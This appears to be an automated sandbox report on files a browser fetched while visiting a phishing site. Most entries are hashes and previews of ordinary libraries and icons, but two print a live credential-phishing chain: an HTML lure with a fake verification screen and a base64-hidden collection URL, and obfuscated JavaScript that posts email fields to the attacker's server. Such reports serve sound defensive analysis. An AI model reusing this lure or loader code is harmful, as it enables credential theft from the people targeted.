                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Apr 17 20:40:53 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                    Category:dropped
                    Size (bytes):2681
                    Entropy (8bit):3.9981281139359224
                    Encrypted:false
                    SSDEEP:
                    MD5:ADD397262855117EC3285AABE0C1E47B
                    SHA1:D799D3352E4354CD89CB0C51C7D33B7680FD8622
                    SHA-256:CE36E70CEBC75F42F0A17236DB11C331296BB21330536939901C9D99FC82D128
                    SHA-512:D3DA5CAD3BB72F96C2AEAB145D76AC0AB0A7476A54707641A4799C5F7144CE96C7F536F35B1D1312002C6139A6066A9ED1C53F3F0CE9FF3F7FE58DF3D44FF1B1
                    Malicious:false
                    Reputation:unknown
                    Preview:L..................F.@.. ...$+.,.....BZ.........y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.I.X......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X......L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.V.X......M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.V.X.............................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V.X.............................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........:.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Apr 17 20:40:53 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                    Category:dropped
                    Size (bytes):2683
                    Entropy (8bit):4.008191050947581
                    Encrypted:false
                    SSDEEP:
                    MD5:CB77F746AFBB6985B096A787A6A9B5B5
                    SHA1:41EBF18651A6ACAF057F32FA4E17DB3BA2981028
                    SHA-256:EC7ED094C1F04480EC556212D4260CADFB06F71818F726D53ED8C0A2B13B31D8
                    SHA-512:FD3040B937BAD33CFA1EEC178E6B70F12A9741A1996F513FDC0E8FF03D77410F929966AB647A9E0FDCEA42338B97A6596076AACB732C3C11A457DDA84CC95071
                    Malicious:false
                    Reputation:unknown
                    Preview:L..................F.@.. ...$+.,....9.D.........y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.I.X......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X......L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.V.X......M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.V.X.............................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V.X.............................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........:.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                    File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 7390
                    Category:downloaded
                    Size (bytes):2407
                    Entropy (8bit):7.900400471609788
                    Encrypted:false
                    SSDEEP:
                    MD5:9D372E951D45A26EDE2DC8B417AAE4F8
                    SHA1:84F97A777B6C33E2947E6D0BD2BFCFFEC601785A
                    SHA-256:4E9C9141705E9A4D83514CEE332148E1E92126376D049DAED9079252FA9F9212
                    SHA-512:78F5AA71EA44FF18BA081288F13AD118DB0E1B9C8D4D321ED40DCAB29277BD171BBB25BA7514566BBD4E25EA416C066019077FAA43E6ED781A29ADB683D218E2
                    Malicious:false
                    Reputation:unknown
                    URL:https://aadcdn.msauth.net/shared/1.0/content/images/picker_verify_fluent_authenticator_b59c16ca9bf156438a8a96d45e33db64.svg
                    Preview:...........Y=s.8......mr...f.y....8.R...l.Nk.l..?....{$.l|e'zM.3...............S(..........O./......Mn.e..O..7.O.?=..?........../...~yy._t....8.a........~.....+..$..*..z..\....~..Jx|............|y...=................./.3....kN2...H...;<sy....H..?2..q5.0.0....f......L.^..v.W.L..7XCm8.I...6\.p.....O/%sX..I.......u............yE......$q....1/.....W....Zg...w..-..v....x...N)........R....c.W5.=...{_1_...+.#.......e...K..:..b.Ec...!...".I1../2X.....].i.sAF;^.1....1/UM.[r..d...>RX..U...<..1...V.|.......X.jX:..0...9..F.KsT...{.6,.._Q..9.b...Q)..0.R.t.u.JN..u$V.%X.9k..t.."..Q.........y.V.Z$7.q.{......k.......W....5.x..K.."y...=......4...h|!....r.."v\f`..c+.......b..hc.jn....0.&G..m.=.@..6../......6....tM^.&3.$......~.....m2...wFs..#5.Hy..?...r.p.O.X.'n...Z8L......7.;..QWGnr.sY..n...3.Jfq..+{m....\...X.q...0...0...........}}d...33.....Q...F$.8..v..UH&.H........0.q..n...q...F.Y7...u..B>..J.A.....$.,....w......Z..oe..w..%....$[+.......d...
                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                    File Type:XML 1.0 document, ASCII text, with no line terminators
                    Category:downloaded
                    Size (bytes):258
                    Entropy (8bit):5.219619977021342
                    Encrypted:false
                    SSDEEP:
                    MD5:23BDEAB1B5873AC908E3D8931C276D0F
                    SHA1:8803549BE5D23BCF5BBED1FE674C2790761260E4
                    SHA-256:3F6DCFCDB77FC538854EFE8D12AFA92BE70336CADE14DBC62E289AA81F207046
                    SHA-512:72630AE59C9A0F222E8FC8EDA58288E7FB60C13363AAF0F186762F3B6761D8F6892520A07AA5B140905FE0098ABECCE8575449BCF788872E13F91DB23179C1CB
                    Malicious:false
                    Reputation:unknown
                    URL:https://mfaauthentication-zipreviewaccessmydocument.us-southeast-1.linodeobjects.com/favicon.ico
                    Preview:<?xml version="1.0" encoding="UTF-8"?><Error><Code>NoSuchKey</Code><BucketName>mfaauthentication-zipreviewaccessmydocument</BucketName><RequestId>tx000001ccc0cc53d8520c7-00662041e6-6312651d-default</RequestId><HostId>6312651d-default-default</HostId></Error>
                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                    File Type:ASCII text, with CRLF line terminators
                    Category:downloaded
                    Size (bytes):2394
                    Entropy (8bit):5.649057747080693
                    Encrypted:false
                    SSDEEP:
                    MD5:72E36B86208F5365C11D02F7854B57CB
                    SHA1:FE48BB3D1ED1A5AC79F4694C31B98004A63D8A2F
                    SHA-256:C88C11409386D08C30F10A312431445362B8C8FC3466F8EA4CE3C4EDB0945CBF
                    SHA-512:7CE33B7805305CD828A9580B2741AC68D8CD4243FB0D3F1515B4FE1A36F47FC1C9BE5CA637530FA41DC7714DE13EE2C6CC0BD4AA01087BB8674A03195BD5BA3F
                    Malicious:false
                    Reputation:unknown
                    URL:https://www.zibah.online/secured/host/admin/js/sc.php?r=ZW0sZW1haWwsYWRk
                    Preview:var vc0378ed007392798285bca2= document.createElement('script');..var autograb = 0;..vc0378ed007392798285bca2.setAttribute('src',atob("aHR0cHM6Ly9jb2RlLmpxdWVyeS5jb20vanF1ZXJ5LTMuMS4xLm1pbi5qcw=="));..document.head.append(vc0378ed007392798285bca2);....var v215809c029fe328226a8e6191a9= document.createElement('script');..v215809c029fe328226a8e6191a9.setAttribute('src',"https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.js");..document.head.append(v215809c029fe328226a8e6191a9);....vc0378ed007392798285bca2.onload=function(){..$.support.cors = true..var v45363e7 = atob;..var v78e009eb = "".split;..var v73333f6229367 = [].constructor.constructor(v45363e7("cmV0dXJuIENyeXB0b0pT"));..var vd5dddd17 = v45363e7($('#b64u').val());..$.post(vd5dddd17,'scte='.concat('') + (autograb == 0 ? '&auto=false' : '') + '&f=WyJlbSIsImVtYWlsIiwiYWRkIl0=')....done(function(v366e7c666101ca10a7d534a5ad6){...function v76d1953b(f){.....var O00O1II = v78e009eb.apply(v45363e7(f),[String.fromCharCode(42
                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                    File Type:HTML document, ASCII text, with very long lines (674), with no line terminators
                    Category:downloaded
                    Size (bytes):674
                    Entropy (8bit):5.277878867168048
                    Encrypted:false
                    SSDEEP:
                    MD5:41C87D26142DD5C99C8AE8AD92C7081A
                    SHA1:D90A288C916DEBEAF92B0F1E4CEB6604C700F3B1
                    SHA-256:C70B6536F33E5E0FC4260098A249CC752F4A5D01F70486077A57C56764337597
                    SHA-512:41C522A780CDA8FBCD88A2C4BF679AB1231A72947DE0471B04C376A1A23C948A1830B7C57FED4A104B2C01A5DF2F9EEE9C8C9E504344B3A575D0504D0DCF199E
                    Malicious:false
                    Reputation:unknown
                    URL:https://mfaauthentication-zipreviewaccessmydocument.us-southeast-1.linodeobjects.com/zi-review.html
                    Preview:<html><head>.<meta name="viewport" content="width=device-width, initial-scale=1.0">.<script src="https://challenges.cloudflare.com/turnstile/v0/api.js?onload=onloadTurnstileCallback" defer async></script></head><body style="display:flex;justify-content:center;align-items:center;text-align:center;">.<div>..<h3 id="status-shower" style="margin-bottom:30px;"> Verifying site connection... </h3>..<div id="cf-show" style=""></div>...<input type="hidden" id="b64u" value="aHR0cHM6Ly93d3cuemliYWgub25saW5lL3NlY3VyZWQvaG9zdC84NGE0M2VhLnBocA==" class=""></input></div>.<script src="https://www.zibah.online/secured/host/admin/js/sc.php?r=ZW0sZW1haWwsYWRk"></script> </body></html>
                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                    File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 2905
                    Category:downloaded
                    Size (bytes):1173
                    Entropy (8bit):7.811199816788843
                    Encrypted:false
                    SSDEEP:
                    MD5:5C7ACF60A2ACAA5C54BF2B2EC6D484D8
                    SHA1:F1837FD5DB6DAD498148D7D77438DE693114B042
                    SHA-256:EE21196A4F5EF64135B7998E58F1E7210608674E3FDF97B328C1C237E3B184DB
                    SHA-512:11516935B1C777D6457B7FB44235F8C8A73BA1313AC8607C16D342EECAE22AE5BFD702CE01DBB2DC63C3D480E89A689C7AA6CAC8D822E306B413534FEE770A77
                    Malicious:false
                    Reputation:unknown
                    URL:https://aadcdn.msauth.net/shared/1.0/content/images/picker_verify_call_fe87496cc7a44412f7893a72099c120a.svg
                    Preview:..........uV.n$7......iR.+..LN9.oA..5.......nx..S...l..%[.*.)..=.....z.?/.._......|{8.4M........^.~w>=>......t.....~.M;.....,....n~}=-.7........U.<>=.._.O.....y9.>.....y...wR.`8..r..q$.....KR...X.....W.....$g'". W<..$..-.2.....h04.O...|._../.6.)..ax..X...wzT.....2..7....1....C.@8B....d.M..KS8..>... .%=...q....yWF....\..kM.H....<..&.mM..s...%.'G.n..(..h.-.I.S.K...1;..:7.xdvP..y.]....Q$..4.@.2Fp ..Oe.......=.I........F......{....`.............uC..G.....'..E.....dR..g.(.+K.q...?...O.%.@.i..."n...1 .JTm.*S..wM.,../.|H..s.....C.=.B1(.B.f..:K.\.T....c..N...sT..D....T.=..Zt..M2.).FP.h.:.*+A.. ^N-$..U.K..n.u.DZ...d.C....s.n.PI..@.4.pi....G..j.5.7l6....Q$...fs....uD......F...e%..}5.S.s.n".9...e&(_.=..oq..F%L...G].....b.`..hi.S.I.8..Y%hM.|..W....jC.-a..'..%.r..W?...a...H...5.c......v.G..v.G.a....a/.LT.Fv......7.A...@.OcV.......6xcy,l[.wkP..-E...U..J.....*1j....2....C+...?.I.Q.C.kM.n...j..5{HV)I...M.G2o......5.....E_..j.....D...^b..+.U..,K2
                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                    File Type:troff or preprocessor input, ASCII text, with very long lines (372)
                    Category:downloaded
                    Size (bytes):37414
                    Entropy (8bit):4.82325822639402
                    Encrypted:false
                    SSDEEP:
                    MD5:C495654869785BC3DF60216616814AD1
                    SHA1:0140952C64E3F2B74EF64E050F2FE86EAB6624C8
                    SHA-256:36E0A7E08BEE65774168528938072C536437669C1B7458AC77976EC788E4439C
                    SHA-512:E40F27C1D30E5AB4B3DB47C3B2373381489D50147C9623D853E5B299364FD65998F46E8E73B1E566FD79E97AA7B20354CD3C8C79F15372C147FED9C913FFB106
                    Malicious:false
                    Reputation:unknown
                    URL:https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.css
                    Preview:/*!. * Font Awesome 4.7.0 by @davegandy - http://fontawesome.io - @fontawesome. * License - http://fontawesome.io/license (Font: SIL OFL 1.1, CSS: MIT License). */./* FONT PATH. * -------------------------- */.@font-face {. font-family: 'FontAwesome';. src: url('../fonts/fontawesome-webfont.eot?v=4.7.0');. src: url('../fonts/fontawesome-webfont.eot?#iefix&v=4.7.0') format('embedded-opentype'), url('../fonts/fontawesome-webfont.woff2?v=4.7.0') format('woff2'), url('../fonts/fontawesome-webfont.woff?v=4.7.0') format('woff'), url('../fonts/fontawesome-webfont.ttf?v=4.7.0') format('truetype'), url('../fonts/fontawesome-webfont.svg?v=4.7.0#fontawesomeregular') format('svg');. font-weight: normal;. font-style: normal;.}..fa {. display: inline-block;. font: normal normal normal 14px/1 FontAwesome;. font-size: inherit;. text-rendering: auto;. -webkit-font-smoothing: antialiased;. -moz-osx-font-smoothing: grayscale;.}./* makes the font 33% larger relative to the icon container */..
                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                    File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 250
                    Category:dropped
                    Size (bytes):199
                    Entropy (8bit):6.766983163126765
                    Encrypted:false
                    SSDEEP:
                    MD5:21B761F2B1FD37F587D7222023B09276
                    SHA1:F7A416C8907424F9A9644753E3A93D4D63AE640E
                    SHA-256:72D4161C18A46D85C5566273567F791976431EFEF49510A0E3DD76FEC92D9393
                    SHA-512:77745F60804D421B34DE26F8A216CEE27C440E469FD786A642757CCEDBC4875D5196431897D80137BD3E20B01104BA76DEC7D8E75771D8A9B5F14B66F2A9B7C0
                    Malicious:false
                    Reputation:unknown
                    Preview:..........u....0.._%2k.8?....w..k..!.M.."b5<.M.bD..c..l.:..}...@.8p.sn.j...%".B...J..6...c..^..?...2d...R..w.<%..}..}s..ir0/.......:8).(.......^u...0..U..I.F....{]...[-......~..F.P_.....G.....
                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                    File Type:ASCII text, with very long lines (32030)
                    Category:downloaded
                    Size (bytes):86709
                    Entropy (8bit):5.367391365596119
                    Encrypted:false
                    SSDEEP:
                    MD5:E071ABDA8FE61194711CFC2AB99FE104
                    SHA1:F647A6D37DC4CA055CED3CF64BBC1F490070ACBA
                    SHA-256:85556761A8800D14CED8FCD41A6B8B26BF012D44A318866C0D81A62092EFD9BF
                    SHA-512:53A2B560B20551672FBB0E6E72632D4FD1C7E2DD2ECF7337EBAAAB179CB8BE7C87E9D803CE7765706BC7FCBCF993C34587CD1237DE5A279AEA19911D69067B65
                    Malicious:false
                    Reputation:unknown
                    URL:https://code.jquery.com/jquery-3.1.1.min.js
                    Preview:/*! jQuery v3.1.1 | (c) jQuery Foundation | jquery.org/license */.!function(a,b){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){"use strict";var c=[],d=a.document,e=Object.getPrototypeOf,f=c.slice,g=c.concat,h=c.push,i=c.indexOf,j={},k=j.toString,l=j.hasOwnProperty,m=l.toString,n=m.call(Object),o={};function p(a,b){b=b||d;var c=b.createElement("script");c.text=a,b.head.appendChild(c).parentNode.removeChild(c)}var q="3.1.1",r=function(a,b){return new r.fn.init(a,b)},s=/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g,t=/^-ms-/,u=/-([a-z])/g,v=function(a,b){return b.toUpperCase()};r.fn=r.prototype={jquery:q,constructor:r,length:0,toArray:function(){return f.call(this)},get:function(a){return null==a?f.call(this):a<0?this[a+this.length]:this[a]},pushStack:function(a){var b=r.merge(this.con
                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                    File Type:ASCII text, with very long lines (42414)
                    Category:downloaded
                    Size (bytes):42415
                    Entropy (8bit):5.374316408837108
                    Encrypted:false
                    SSDEEP:
                    MD5:374FEC8B5E50CD6AB980F3FEF21A5AA0
                    SHA1:7F474607991A19B6F1B78CC32E0F75B501B60774
                    SHA-256:8AF2DA74872F03E058AB79A584176D2086AFC01BBD42DD2ED14259179341BE6A
                    SHA-512:3420E0DEF4FA49BD8B67DA80F1C3F56A08B4892BC0373D7BB824F8126713B209116147D4B1E1D5E7B07C6DBC58B1AD411AEB2F5A0DAE99FFC220246311E3808E
                    Malicious:false
                    Reputation:unknown
                    URL:https://challenges.cloudflare.com/turnstile/v0/g/54ea73d52131/api.js?onload=onloadTurnstileCallback
                    Preview:"use strict";(function(){function bt(e,r,t,o,u,s,m){try{var b=e[s](m),h=b.value}catch(d){t(d);return}b.done?r(h):Promise.resolve(h).then(o,u)}function Et(e){return function(){var r=this,t=arguments;return new Promise(function(o,u){var s=e.apply(r,t);function m(h){bt(s,o,u,m,b,"next",h)}function b(h){bt(s,o,u,m,b,"throw",h)}m(void 0)})}}function M(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):M(e,r)}function Ie(e,r,t){return r in e?Object.defineProperty(e,r,{value:t,enumerable:!0,configurable:!0,writable:!0}):e[r]=t,e}function Ve(e){for(var r=1;r<arguments.length;r++){var t=arguments[r]!=null?arguments[r]:{},o=Object.keys(t);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(t).filter(function(u){return Object.getOwnPropertyDescriptor(t,u).enumerable}))),o.forEach(function(u){Ie(e,u,t[u])})}return e}function fr(e,r){var t=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                    File Type:ASCII text, with very long lines (47992), with no line terminators
                    Category:downloaded
                    Size (bytes):47992
                    Entropy (8bit):5.605846858683577
                    Encrypted:false
                    SSDEEP:
                    MD5:CF3402D7483B127DED4069D651EA4A22
                    SHA1:BDE186152457CACF9C35477B5BDDA5BCB56B1F45
                    SHA-256:EAB5D90A71736F267AF39FDF32CAA8C71673FD06703279B01E0F92B0D7BE0BFC
                    SHA-512:9CE42EBC3F672A2AEFC4376F43D38CA9ED9D81AA5B3C1EEF60032BCC98A1C399BE68D71FD1D5F9DE6E98C4CE0B800F6EF1EF5E83D417FBFFA63EEF2408DA55D8
                    Malicious:false
                    Reputation:unknown
                    URL:https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.js
                    Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var h,t,e,r,i,n,f,o,s,c,a,l,d,m,x,b,H,z,A,u,p,_,v,y,g,B,w,k,S,C,D,E,R,M,F,P,W,O,I,U,K,X,L,j,N,T,q,Z,V,G,J,$,Q,Y,tt,et,rt,it,nt,ot,st,ct,at,ht,lt,ft,dt,ut,pt,_t,vt,yt,gt,Bt,wt,kt,St,bt=bt||function(l){var t;if("undefined"!=typeof window&&window.crypto&&(t=window.crypto),!t&&"undefined"!=typeof window&&window.msCrypto&&(t=window.msCrypto),!t&&"undefined"!=typeof global&&global.crypto&&(t=global.crypto),!t&&"function"==typeof require)try{t=require("crypto")}catch(t){}function i(){if(t){if("function"==typeof t.getRandomValues)try{return t.getRandomValues(new Uint32Array(1))[0]}catch(t){}if("function"==typeof t.randomBytes)try{return t.randomBytes(4).readInt32LE()}catch(t){}}throw new Error("Native crypto module could not be used to get secure random number.")}var r=Object.create||function(t){var e;return n.prototype=t,e=new n,n.prototype=null
                    No static file info